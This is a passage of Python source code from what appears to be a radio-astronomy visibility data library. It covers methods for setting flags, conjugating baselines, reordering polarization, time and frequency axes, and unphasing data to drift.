key1, key2, key3 : int or tuple of ints
Identifier of which flags to set, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, set all flags for
that pol.
else:
interpreted as a baseline number, set all flags for that baseline.
if key is length 2: interpreted as an antenna pair, set all flags
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
set all flags for that baseline, pol. pol may be a string or int.
Returns
-------
None
Raises
------
ValueError:
If more than 3 keys are passed, if the requested indices are
conjugated in the data, if the data array shape is not compatible
with the indices.
"""
dshape = flags.shape
inds = self._set_method_helper(dshape, key1, key2, key3)
uvutils._index_dset(self.flag_array, inds, flags)
return
def set_nsamples(self, nsamples, key1, key2=None, key3=None):
"""
Set the nsamples array to some values provided by the user.
Parameters
----------
nsamples : ndarray of float
The nsamples to overwrite into the nsample_array. Must be the same
shape as the target indices.
key1, key2, key3 : int or tuple of ints
Identifier of which nsamples to set, can be passed as 1, 2, or 3
arguments or as a single tuple of length 1, 2, or 3. These are
collectively called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, set all data for
that pol.
else:
interpreted as a baseline number, set all nsamples for that
baseline.
if key is length 2: interpreted as an antenna pair, set all nsamples
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2,
pol), set all nsamples for that baseline, pol. pol may be a
string or int.
Returns
-------
None
Raises
------
ValueError:
If more than 3 keys are passed, if the requested indices are
conjugated in the data, if the data array shape is not compatible
with the indices.
"""
dshape = nsamples.shape
inds = self._set_method_helper(dshape, key1, key2, key3)
uvutils._index_dset(self.nsample_array, inds, nsamples)
return
def antpairpol_iter(self, squeeze="default"):
"""
Iterate the data for each antpair, polarization combination.
Parameters
----------
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
Yields
------
key : tuple
antenna1, antenna2, and polarization string
data : ndarray of complex
data for the ant pair and polarization specified in key
"""
antpairpols = self.get_antpairpols()
for key in antpairpols:
yield (key, self.get_data(key, squeeze=squeeze))
def conjugate_bls(self, convention="ant1<ant2", use_enu=True, uvw_tol=0.0):
"""
Conjugate baselines according to one of the supported conventions.
This will fail if only one of the cross pols is present (because
conjugation requires changing the polarization number for cross pols).
Parameters
----------
convention : str or array_like of int
A convention for the directions of the baselines, options are:
'ant1<ant2', 'ant2<ant1', 'u<0', 'u>0', 'v<0', 'v>0' or an
index array of blt indices to conjugate.
use_enu : bool
Use true antenna positions to determine uv location (as opposed to
uvw array). Only applies if `convention` is 'u<0', 'u>0', 'v<0', 'v>0'.
Set to False to use uvw array values.
uvw_tol : float
Defines a tolerance on uvw coordinates for setting the
u>0, u<0, v>0, or v<0 conventions. Defaults to 0m.
Raises
------
ValueError
If convention is not an allowed value or if not all conjugate pols exist.
"""
if isinstance(convention, (np.ndarray, list, tuple)):
convention = np.array(convention)
if (
np.max(convention) >= self.Nblts
or np.min(convention) < 0
or convention.dtype not in [int, np.int_, np.int32, np.int64]
):
raise ValueError(
"If convention is an index array, it must "
"contain integers and have values greater "
"than zero and less than NBlts"
)
else:
if convention not in ["ant1<ant2", "ant2<ant1", "u<0", "u>0", "v<0", "v>0"]:
raise ValueError(
"convention must be one of 'ant1<ant2', "
"'ant2<ant1', 'u<0', 'u>0', 'v<0', 'v>0' or "
"an index array with values less than NBlts"
)
if isinstance(convention, str):
if convention in ["u<0", "u>0", "v<0", "v>0"]:
if use_enu is True:
enu, anum = self.get_ENU_antpos()
anum = anum.tolist()
uvw_array_use = np.zeros_like(self.uvw_array)
for i, bl in enumerate(self.baseline_array):
a1, a2 = self.ant_1_array[i], self.ant_2_array[i]
i1, i2 = anum.index(a1), anum.index(a2)
uvw_array_use[i, :] = enu[i2] - enu[i1]
else:
uvw_array_use = copy.copy(self.uvw_array)
if convention == "ant1<ant2":
index_array = np.asarray(self.ant_1_array > self.ant_2_array).nonzero()
elif convention == "ant2<ant1":
index_array = np.asarray(self.ant_2_array > self.ant_1_array).nonzero()
elif convention == "u<0":
index_array = np.asarray(
(uvw_array_use[:, 0] > uvw_tol)
| (uvw_array_use[:, 1] > uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
| (uvw_array_use[:, 2] > uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
).nonzero()
elif convention == "u>0":
index_array = np.asarray(
(uvw_array_use[:, 0] < -uvw_tol)
| (
(uvw_array_use[:, 1] < -uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
)
| (
(uvw_array_use[:, 2] < -uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
)
).nonzero()
elif convention == "v<0":
index_array = np.asarray(
(uvw_array_use[:, 1] > uvw_tol)
| (uvw_array_use[:, 0] > uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
| (uvw_array_use[:, 2] > uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
).nonzero()
elif convention == "v>0":
index_array = np.asarray(
(uvw_array_use[:, 1] < -uvw_tol)
| (uvw_array_use[:, 0] < -uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
| (uvw_array_use[:, 2] < -uvw_tol)
& np.isclose(uvw_array_use[:, 0], 0, atol=uvw_tol)
& np.isclose(uvw_array_use[:, 1], 0, atol=uvw_tol)
).nonzero()
else:
index_array = convention
if index_array[0].size > 0:
new_pol_inds = uvutils.reorder_conj_pols(self.polarization_array)
self.uvw_array[index_array] *= -1
if not self.metadata_only:
orig_data_array = copy.copy(self.data_array)
for pol_ind in np.arange(self.Npols):
if self.future_array_shapes:
self.data_array[
index_array, :, new_pol_inds[pol_ind]
] = np.conj(orig_data_array[index_array, :, pol_ind])
else:
self.data_array[
index_array, :, :, new_pol_inds[pol_ind]
] = np.conj(orig_data_array[index_array, :, :, pol_ind])
ant_1_vals = self.ant_1_array[index_array]
ant_2_vals = self.ant_2_array[index_array]
self.ant_1_array[index_array] = ant_2_vals
self.ant_2_array[index_array] = ant_1_vals
self.baseline_array[index_array] = self.antnums_to_baseline(
self.ant_1_array[index_array], self.ant_2_array[index_array]
)
self.Nbls = np.unique(self.baseline_array).size
def reorder_pols(
self,
order="AIPS",
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Rearrange polarizations in the event they are not uvfits compatible.
Parameters
----------
order : str
Either a string specifying a canonical ordering ('AIPS' or 'CASA')
or an index array of length Npols that specifies how to shuffle the
data (this is not the desired final pol order).
CASA ordering has cross-pols in between (e.g. XX,XY,YX,YY)
AIPS ordering has auto-pols followed by cross-pols (e.g. XX,YY,XY,YX)
Default ('AIPS') will sort by absolute value of pol values.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reordering.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reordering.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If the order is not one of the allowed values.
"""
if isinstance(order, (np.ndarray, list, tuple)):
order = np.array(order)
if (
order.size != self.Npols
or order.dtype not in [int, np.int_, np.int32, np.int64]
or np.min(order) < 0
or np.max(order) >= self.Npols
):
raise ValueError(
"If order is an index array, it must "
"contain integers and be length Npols."
)
index_array = order
elif order == "AIPS":
index_array = np.argsort(np.abs(self.polarization_array))
elif order == "CASA":
casa_order = np.array([1, 2, 3, 4, -1, -3, -4, -2, -5, -7, -8, -6])
pol_inds = []
for pol in self.polarization_array:
pol_inds.append(np.where(casa_order == pol)[0][0])
index_array = np.argsort(pol_inds)
else:
raise ValueError(
"order must be one of: 'AIPS', 'CASA', or an "
"index array of length Npols"
)
self.polarization_array = self.polarization_array[index_array]
if not self.metadata_only:
# data array is special and large, take is faster here
if self.future_array_shapes:
self.data_array = np.take(self.data_array, index_array, axis=2)
self.nsample_array = self.nsample_array[:, :, index_array]
self.flag_array = self.flag_array[:, :, index_array]
else:
self.data_array = np.take(self.data_array, index_array, axis=3)
self.nsample_array = self.nsample_array[:, :, :, index_array]
self.flag_array = self.flag_array[:, :, :, index_array]
# check if object is self-consistent
if run_check:
self.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
def reorder_blts(
self,
order="time",
minor_order=None,
conj_convention=None,
uvw_tol=0.0,
conj_convention_use_enu=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Arrange blt axis according to desired order.
Optionally conjugate some baselines.
Parameters
----------
order : str or array_like of int
A string describing the desired order along the blt axis.
Options are: `time`, `baseline`, `ant1`, `ant2`, `bda` or an
index array of length Nblts that specifies the new order.
minor_order : str
Optionally specify a secondary ordering. Default depends on how
order is set: if order is 'time', this defaults to `baseline`,
if order is `ant1`, or `ant2` this defaults to the other antenna,
if order is `baseline` the only allowed value is `time`. Ignored if
order is `bda` If this is the same as order, it is reset to the default.
conj_convention : str or array_like of int
Optionally conjugate baselines to make the baselines have the
desired orientation. See conjugate_bls for allowed values and details.
uvw_tol : float
If conjugating baselines, sets a tolerance for determining the signs
of u,v, and w, and whether or not they are zero.
See conjugate_bls for details.
conj_convention_use_enu: bool
If `conj_convention` is set, this is passed to conjugate_bls, see that
method for details.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reordering.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reordering.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If parameter values are inappropriate
"""
if isinstance(order, (np.ndarray, list, tuple)):
order = np.array(order)
if order.size != self.Nblts or order.dtype not in [
int,
np.int_,
np.int32,
np.int64,
]:
raise ValueError(
"If order is an index array, it must "
"contain integers and be length Nblts."
)
if minor_order is not None:
raise ValueError(
"Minor order cannot be set if order is an index array."
)
else:
if order not in ["time", "baseline", "ant1", "ant2", "bda"]:
raise ValueError(
"order must be one of 'time', 'baseline', "
"'ant1', 'ant2', 'bda' or an index array of "
"length Nblts"
)
if minor_order == order:
minor_order = None
if minor_order is not None:
if minor_order not in ["time", "baseline", "ant1", "ant2"]:
raise ValueError(
"minor_order can only be one of 'time', "
"'baseline', 'ant1', 'ant2'"
)
if isinstance(order, np.ndarray) or order == "bda":
raise ValueError(
"minor_order cannot be specified if order is "
"'bda' or an index array."
)
if order == "baseline":
if minor_order in ["ant1", "ant2"]:
raise ValueError("minor_order conflicts with order")
else:
if order == "time":
minor_order = "baseline"
elif order == "ant1":
minor_order = "ant2"
elif order == "ant2":
minor_order = "ant1"
elif order == "baseline":
minor_order = "time"
if conj_convention is not None:
self.conjugate_bls(
convention=conj_convention,
use_enu=conj_convention_use_enu,
uvw_tol=uvw_tol,
)
if isinstance(order, str):
if minor_order is None:
self.blt_order = (order,)
self._blt_order.form = (1,)
else:
self.blt_order = (order, minor_order)
# set it back to the right shape in case it was set differently before
self._blt_order.form = (2,)
else:
self.blt_order = None
if not isinstance(order, np.ndarray):
# Use lexsort to sort along different arrays in defined order.
if order == "time":
arr1 = self.time_array
if minor_order == "ant1":
arr2 = self.ant_1_array
arr3 = self.ant_2_array
elif minor_order == "ant2":
arr2 = self.ant_2_array
arr3 = self.ant_1_array
else:
# minor_order is baseline
arr2 = self.baseline_array
arr3 = self.baseline_array
elif order == "ant1":
arr1 = self.ant_1_array
if minor_order == "time":
arr2 = self.time_array
arr3 = self.ant_2_array
elif minor_order == "ant2":
arr2 = self.ant_2_array
arr3 = self.time_array
else: # minor_order is baseline
arr2 = self.baseline_array
arr3 = self.time_array
elif order == "ant2":
arr1 = self.ant_2_array
if minor_order == "time":
arr2 = self.time_array
arr3 = self.ant_1_array
elif minor_order == "ant1":
arr2 = self.ant_1_array
arr3 = self.time_array
else:
# minor_order is baseline
arr2 = self.baseline_array
arr3 = self.time_array
elif order == "baseline":
arr1 = self.baseline_array
# only allowed minor order is time
arr2 = self.time_array
arr3 = self.time_array
elif order == "bda":
arr1 = self.integration_time
# only allowed minor order is time
arr2 = self.baseline_array
arr3 = self.time_array
# lexsort uses the listed arrays from last to first
# (so the primary sort is on the last one)
index_array = np.lexsort((arr3, arr2, arr1))
else:
index_array = order
# actually do the reordering
self.ant_1_array = self.ant_1_array[index_array]
self.ant_2_array = self.ant_2_array[index_array]
self.baseline_array = self.baseline_array[index_array]
self.uvw_array = self.uvw_array[index_array, :]
self.time_array = self.time_array[index_array]
self.lst_array = self.lst_array[index_array]
self.integration_time = self.integration_time[index_array]
if self.phase_center_app_ra is not None:
self.phase_center_app_ra = self.phase_center_app_ra[index_array]
if self.phase_center_app_dec is not None:
self.phase_center_app_dec = self.phase_center_app_dec[index_array]
if self.phase_center_frame_pa is not None:
self.phase_center_frame_pa = self.phase_center_frame_pa[index_array]
if self.multi_phase_center:
self.phase_center_id_array = self.phase_center_id_array[index_array]
if not self.metadata_only:
self.data_array = self.data_array[index_array]
self.flag_array = self.flag_array[index_array]
self.nsample_array = self.nsample_array[index_array]
# check if object is self-consistent
if run_check:
self.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
def reorder_freqs(
self,
spw_order=None,
channel_order=None,
select_spw=None,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Arrange frequency axis according to desired order.
Can be applied across the entire frequency axis, or just a subset.
Parameters
----------
spw_order : str or array_like of int
A string describing the desired order of spectral windows along the
frequecy axis. Allowed strings include `number` (sort on spectral window
number) and `freq` (sort on median frequency). A '-' can be appended
to signify descending order instead of the default ascending order,
e.g., if you have SPW #1 and 2, and wanted them ordered as [2, 1],
you would specify `-number`. Alternatively, one can supply an array
of length Nspws that specifies the new order, with values matched to
the specral window number given in `spw_array`. Default is to apply no
sorting of spectral windows.
channel_order : str or array_like of int
A string describing the desired order of frequency channels within a
spectral window. Allowed strings include `freq`, which will sort channels
within a spectral window by frequency. A '-' can be optionally appended
to signify descending order instead of the default ascending order.
Alternatively, one can supply an index array of length Nfreqs that
specifies the new order. Default is to apply no sorting of channels
within a single spectral window. Note that proving an array_like of ints
will cause the values given to `spw_order` and `select_spw` to be ignored.
select_spw : int or array_like of int
An int or array_like of ints which specifies which spectral windows to
apply sorting. Note that setting this argument will cause the value
given to `spw_order` to be ignored.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reordering.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reordering.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Returns
-------
None
Raises
------
UserWarning
Raised if providing arguments to select_spw and freq_screen (the latter
overrides the former).
ValueError
Raised if select_spw contains values not in spw_array, or if freq_screen
is not the same length as freq_array.
"""
if (spw_order is None) and (channel_order is None):
warnings.warn(
"Not specifying either spw_order or channel_order causes "
"no sorting actions to be applied. Returning object unchanged."
)
return
# Check to see if there are arguments we should be ignoring
if isinstance(channel_order, (np.ndarray, list, tuple)):
if select_spw is not None:
warnings.warn(
"The select_spw argument is ignored when providing an "
"array_like of int for channel_order"
)
if spw_order is not None:
warnings.warn(
"The spw_order argument is ignored when providing an "
"array_like of int for channel_order"
)
if not np.all(np.sort(channel_order) == np.arange(self.Nfreqs)):
raise ValueError(
"Index array for channel_order must contain all indicies for "
"the frequency axis, without duplicates."
)
index_array = channel_order
else:
index_array = np.arange(self.Nfreqs)
# Multipy by 1.0 here to make a cheap copy of the array to manipulate
temp_freqs = 1.0 * (
self.freq_array if self.future_array_shapes else self.freq_array[0, :]
)
# Same trick for ints -- add 0 to make a cheap copy
temp_spws = 0 + (
self.flex_spw_id_array
if self.flex_spw
else (np.zeros(self.Nfreqs) + self.spw_array)
)
# Check whether or not we need to sort the channels in individual windows
sort_spw = {idx: channel_order is not None for idx in self.spw_array}
if select_spw is not None:
if spw_order is not None:
warnings.warn(
"The spw_order argument is ignored when providing an "
"argument for select_spw"
)
if channel_order is None:
warnings.warn(
"Specifying select_spw without providing channel_order causes "
"no sorting actions to be applied. Returning object unchanged."
)
return
if isinstance(select_spw, (np.ndarray, list, tuple)):
sort_spw = {idx: idx in select_spw for idx in self.spw_array}
else:
sort_spw = {idx: idx == select_spw for idx in self.spw_array}
elif spw_order is not None:
if isinstance(spw_order, (np.ndarray, list, tuple)):
if not np.all(np.sort(spw_order) == np.sort(self.spw_array)):
raise ValueError(
"Index array for spw_order must contain all indicies for "
"the frequency axis, without duplicates."
)
elif spw_order not in ["number", "freq", "-number", "-freq", None]:
raise ValueError(
"spw_order can only be one of 'number', '-number', "
"'freq', '-freq', or None"
)
elif self.Nspws > 1:
# Only need to do this step if we actually have multiple spws.
# If the string starts with a '-', then we will flip the order at
# the end of the operation
flip_spws = spw_order[0] == "-"
if "number" in spw_order:
spw_order = np.sort(self.spw_array)
elif "freq" in spw_order:
spw_order = self.spw_array[
np.argsort(
[
np.median(temp_freqs[temp_spws == idx])
for idx in self.spw_array
]
)
]
if flip_spws:
spw_order = np.flip(spw_order)
# Now that we know the spw order, we can apply the first sort
index_array = np.concatenate(
[index_array[temp_spws == idx] for idx in spw_order]
)
temp_freqs = temp_freqs[index_array]
temp_spws = temp_spws[index_array]
# Spectral windows are assumed sorted at this point
if channel_order is not None:
if channel_order not in ["freq", "-freq"]:
raise ValueError(
"channel_order can only be one of 'freq' or '-freq'"
)
for idx in self.spw_array:
if sort_spw[idx]:
select_mask = temp_spws == idx
subsort_order = index_array[select_mask]
subsort_order = subsort_order[
np.argsort(temp_freqs[select_mask])
]
index_array[select_mask] = (
np.flip(subsort_order)
if channel_order[0] == "-"
else subsort_order
)
if np.all(index_array[1:] > index_array[:-1]):
# Nothing to do - the data are already sorted!
return
# Now update all of the arrays.
if self.future_array_shapes:
self.freq_array = self.freq_array[index_array]
if not self.metadata_only:
self.data_array = self.data_array[:, index_array, :]
self.flag_array = self.flag_array[:, index_array, :]
self.nsample_array = self.nsample_array[:, index_array, :]
else:
self.freq_array = self.freq_array[:, index_array]
if not self.metadata_only:
self.data_array = self.data_array[:, :, index_array, :]
self.flag_array = self.flag_array[:, :, index_array, :]
self.nsample_array = self.nsample_array[:, :, index_array, :]
if self.flex_spw:
self.flex_spw_id_array = self.flex_spw_id_array[index_array]
self.channel_width = self.channel_width[index_array]
# Reorder the spw-axis items based on their first appearance in the data
unique_index = np.sort(
np.unique(self.flex_spw_id_array, return_index=True)[1]
)
self.spw_array = self.flex_spw_id_array[unique_index]
if self.eq_coeffs is not None:
self.eq_coeffs = self.eq_coeffs[:, index_array]
# check if object is self-consistent
if run_check:
self.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
def remove_eq_coeffs(self):
"""
Remove equalization coefficients from the data.
Some telescopes, e.g. HERA, apply per-antenna, per-frequency gain
coefficients as part of the signal chain. These are stored in the
`eq_coeffs` attribute of the object. This method will remove them, so
that the data are in "unnormalized" raw units.
Parameters
----------
None
Returns
-------
None
Raises
------
ValueError
Raised if eq_coeffs or eq_coeffs_convention are not defined on the
object, or if eq_coeffs_convention is not one of "multiply" or "divide".
"""
if self.eq_coeffs is None:
raise ValueError(
"The eq_coeffs attribute must be defined on the object to apply them."
)
if self.eq_coeffs_convention is None:
raise ValueError(
"The eq_coeffs_convention attribute must be defined on the object "
"to apply them."
)
if self.eq_coeffs_convention not in ("multiply", "divide"):
raise ValueError(
"Got unknown convention {}. Must be one of: "
'"multiply", "divide"'.format(self.eq_coeffs_convention)
)
# apply coefficients for each baseline
for key in self.get_antpairs():
# get indices for this key
blt_inds = self.antpair2ind(key)
ant1_index = np.asarray(self.antenna_numbers == key[0]).nonzero()[0][0]
ant2_index = np.asarray(self.antenna_numbers == key[1]).nonzero()[0][0]
eq_coeff1 = self.eq_coeffs[ant1_index, :]
eq_coeff2 = self.eq_coeffs[ant2_index, :]
# make sure coefficients are the right size to broadcast
eq_coeff1 = np.repeat(eq_coeff1[:, np.newaxis], self.Npols, axis=1)
eq_coeff2 = np.repeat(eq_coeff2[:, np.newaxis], self.Npols, axis=1)
if self.eq_coeffs_convention == "multiply":
self.data_array[blt_inds] *= eq_coeff1 * eq_coeff2
else:
self.data_array[blt_inds] /= eq_coeff1 * eq_coeff2
return
def _apply_w_proj(self, new_w_vals, old_w_vals, select_mask=None):
"""
Apply corrections based on changes to w-coord.
Adjusts the data to account for a change along the w-axis of a baseline.
Parameters
----------
new_w_vals: float or ndarray of float
New w-coordinates for the baselines, in units of meters. Can either be a
solitary float (helpful for unphasing data, where new_w_vals can be set to
0.0) or an array of shape (Nselect,) (which is Nblts if select_mask=None).
old_w_vals: float or ndarray of float
Old w-coordinates for the baselines, in units of meters. Can either be a
solitary float (helpful for unphasing data, where new_w_vals can be set to
0.0) or an array of shape (Nselect,) (which is Nblts if select_mask=None).
select_mask: ndarray of bool
Array is of shape (Nblts,), where the sum of all enties marked True is
equal to Nselect (mentioned above).
Raises
------
IndexError
If the length of new_w_vals or old_w_vals isn't compatible with
select_mask, or if select mask isn't the right length.
"""
# If we only have metadata, then we have no work to do. W00t!
if self.metadata_only or (self.data_array is None):
return
if select_mask is None:
select_len = self.Nblts
else:
try:
inv_mask = np.ones(self.Nblts, dtype=bool)
inv_mask[select_mask] = False
select_mask = ~inv_mask
select_len = np.sum(select_mask)
except IndexError:
raise IndexError(
"select_mask must be an array-like, either of ints with shape "
"(Nblts), or of ints within the range (-Nblts, Nblts)."
)
# Promote everything to float64 ndarrays if they aren't already
old_w_vals = np.array(old_w_vals, dtype=np.float64)
old_w_vals.shape += (1,) if (old_w_vals.ndim == 0) else ()
new_w_vals = np.array(new_w_vals, dtype=np.float64)
new_w_vals.shape += (1,) if (new_w_vals.ndim == 0) else ()
# Make sure the lengths of everything make sense
new_val_len = len(new_w_vals)
old_val_len = len(old_w_vals)
if new_val_len not in [1, select_len]:
raise IndexError(
"The length of new_w_vals is wrong (expected 1 or %i, got %i)!"
% (select_len, new_val_len)
)
if old_val_len not in [1, select_len]:
raise IndexError(
"The length of old_w_vals is wrong (expected 1 or %i, got %i)!"
% (select_len, old_val_len)
)
# Calculate the difference in w terms as a function of freq. Note that the
# 1/c is there to speed of processing (faster to multiply than divide)
delta_w_lambda = (
(new_w_vals - old_w_vals).reshape(-1, 1)
* (1.0 / const.c.to("m/s").value)
* self.freq_array.reshape(1, self.Nfreqs)
)
if select_mask is None or np.all(select_mask):
# If all the w values are changing, it turns out to be twice as fast
# to ditch any sort of selection mask and just do the full multiply.
if self.future_array_shapes:
self.data_array *= np.exp(
(-1j * 2 * np.pi) * delta_w_lambda[:, :, None]
)
else:
self.data_array *= np.exp(
(-1j * 2 * np.pi) * delta_w_lambda[:, None, :, None]
)
elif np.any(select_mask):
# In the case we are _not_ doing all baselines, use a selection mask to
# only update the values we need. In the worse case, it slows down the
# processing by ~2x, but it can save a lot on time and memory if only
# needing to update a select number of baselines.
if self.future_array_shapes:
self.data_array[select_mask] *= np.exp(
(-1j * 2 * np.pi) * delta_w_lambda[:, :, None]
)
else:
self.data_array[select_mask] *= np.exp(
(-1j * 2 * np.pi) * delta_w_lambda[:, None, :, None]
)
def unphase_to_drift(
self, phase_frame=None, use_ant_pos=True, use_old_proj=False,
):
"""
Convert from a phased dataset to a drift dataset.
See the phasing memo under docs/references for more documentation.
Parameters
----------
phase_frame : str
The astropy frame to phase from. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation, 'icrs' also includes abberation.
Defaults to using the 'phase_center_frame' attribute or 'icrs'
if that attribute is None.
use_ant_pos : bool
If True, calculate the uvws directly from the antenna positions
rather than from the existing uvws. Default is True.
use_old_proj : bool
If True, uses the 'old' way of calculating baseline projections.
Default is False.
Raises
------
ValueError
If the phase_type is not 'phased'
"""
if self.phase_type == "phased":
pass
else:
raise ValueError(
"The data is already drift scanning; can only unphase phased data."
)
if not use_old_proj:
# Check to make sure that these attributes are actually filled. Otherwise,
# you probably want to use the old phase method.
if (
(not use_ant_pos)
and (self.phase_center_app_ra is None)
or (self.phase_center_app_dec is None)
):
raise AttributeError(
"Object missing phase_center_ra_app or phase_center_dec_app, "
"which implies that the data were phased using the 'old' "
"method for phasing (which is not compatible with the new "
"version of the code). Please run unphase_to_drift with "
"use_old_proj=True to continue."
)
telescope_location = self.telescope_location_lat_lon_alt
# Check and see if we have any unphased objects, in which case
# their w-values should be zeroed out.
select_mask = ~self._check_for_unphased()
new_uvw = uvutils.calc_uvw(
lst_array=self.lst_array,
use_ant_pos=use_ant_pos,
uvw_array=self.uvw_array,
antenna_positions=self.antenna_positions,
antenna_numbers=self.antenna_numbers,
ant_1_array=self.ant_1_array,
ant_2_array=self.ant_2_array,
old_app_ra=self.phase_center_app_ra,
old_app_dec=self.phase_center_app_dec,
old_frame_pa=self.phase_center_frame_pa,
telescope_lat=telescope_location[0],
telescope_lon=telescope_location[1],
to_enu=True,
)
self._apply_w_proj(0.0, self.uvw_array[select_mask, 2], select_mask)
self.uvw_array = new_uvw
# remove/update phase center
if self.multi_phase_center:
self.phase_center_id_array[:] = self._add_phase_center(
"unphased", "unphased"
)
self.phase_center_app_ra = self.lst_array.copy()
self.phase_center_app_dec[:] = (
np.zeros(self.Nblts) + self.telescope_location[0]
)
self.phase_center_frame_pa = np.zeros(self.Nblts)
else:
self.phase_center_frame = None
self.phase_center_ra = None
self.phase_center_dec = None
self.phase_center_epoch = None
self.phase_center_app_ra = None
self.phase_center_app_dec = None
self.phase_center_frame_pa = None
self._set_drift()
return
# If you are a multi phase center data set, there's no valid reason to be going
# back to the old phase method. Time to bail!
if self.multi_phase_center:
raise ValueError(
"Multi phase center data sets are not compatible with the old phasing "
"method, please set use_old_proj=False."
)
if phase_frame is None:
if self.phase_center_frame is not None:
phase_frame = self.phase_center_frame
else:
phase_frame = "icrs"
icrs_coord = SkyCoord(
ra=self.phase_center_ra,
dec=self.phase_center_dec,
unit="radian",
frame="icrs",
)
if phase_frame == "icrs":
frame_phase_center = icrs_coord
else:
# use center of observation for obstime for gcrs
center_time = np.mean([np.max(self.time_array), np.min(self.time_array)])
icrs_coord.obstime = Time(center_time, format="jd")
frame_phase_center = icrs_coord.transform_to("gcrs")
# This promotion is REQUIRED to get the right answer when we
# add in the telescope location for ICRS
# In some cases, the uvws are already float64, but sometimes they're not
self.uvw_array = np.float64(self.uvw_array)
# apply -w phasor
if not self.metadata_only:
w_lambda = (
self.uvw_array[:, 2].reshape(self.Nblts, 1)
/ const.c.to("m/s").value
* self.freq_array.reshape(1, self.Nfreqs)
)
if self.future_array_shapes:
phs = np.exp(-1j * 2 * np.pi * (-1) * w_lambda[:, :, None])
else:
phs = np.exp(-1j * 2 * np.pi * (-1) * w_lambda[:, None, :, None])
self.data_array *= phs
unique_times, unique_inds = np.unique(self.time_array, return_index=True)
telescope_location = EarthLocation.from_geocentric(
*self.telescope_location, unit=units.m
)
obs_times = Time(unique_times, format="jd")
itrs_telescope_locations = telescope_location.get_itrs(obstime=obs_times)
itrs_telescope_locations = SkyCoord(itrs_telescope_locations)
# just calling transform_to(coord.GCRS) will delete the obstime information
# need to re-add obstimes for a GCRS transformation
if phase_frame == "gcrs":
frame_telescope_locations = itrs_telescope_locations.transform_to(
getattr(coord, f"{phase_frame}".upper())(obstime=obs_times)
)
else:
frame_telescope_locations = itrs_telescope_locations.transform_to(
getattr(coord, f"{phase_frame}".upper())
)
frame_telescope_locations.representation_type = "cartesian"
for ind, jd in enumerate(unique_times):
inds = np.where(self.time_array == jd)[0]
obs_time = obs_times[ind]
if use_ant_pos:
ant_uvw = uvutils.phase_uvw(
self.telescope_location_lat_lon_alt[1],
self.telescope_location_lat_lon_alt[0],
self.antenna_positions,
)
# instead of looping through every ind, find the spot in antenna number
# array where ant_num <= ant1 < ant_number and similarly for ant2
# for all baselines in inds
# then find the uvw coordinate for all at the same time
# antenna_numbers does not necessarily need to be in order on the object
# but needs to be in order for the searchsorted to work.
# ant1_index and ant2_index arrays will preserve the order of blts
ant_sort = np.argsort(self.antenna_numbers)
ant1_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_1_array[inds]
)
ant2_index = np.searchsorted(
self.antenna_numbers[ant_sort], self.ant_2_array[inds]
)
self.uvw_array[inds] = (
ant_uvw[ant_sort][ant2_index, :] - ant_uvw[ant_sort][ant1_index, :]
)
else:
frame_telescope_location = frame_telescope_locations[ind]
itrs_lat_lon_alt = self.telescope_location_lat_lon_alt
uvws_use = self.uvw_array[inds, :]
uvw_rel_positions = uvutils.unphase_uvw(
frame_phase_center.ra.rad, frame_phase_center.dec.rad, uvws_use
)
frame_uvw_coord = SkyCoord(
x=uvw_rel_positions[:, 0] * units.m + frame_telescope_location.x,
y=uvw_rel_positions[:, 1] * units.m + frame_telescope_location.y,
z=uvw_rel_positions[:, 2] * units.m + frame_telescope_location.z,
frame=phase_frame,
obstime=obs_time,
representation_type="cartesian",
)
itrs_uvw_coord = frame_uvw_coord.transform_to("itrs")
# now convert them to ENU, which is the space uvws are in
self.uvw_array[inds, :] = uvutils.ENU_from_ECEF(
itrs_uvw_coord.cartesian.get_xyz().value.T, *itrs_lat_lon_alt
)
# remove phase center
self.phase_center_frame = None
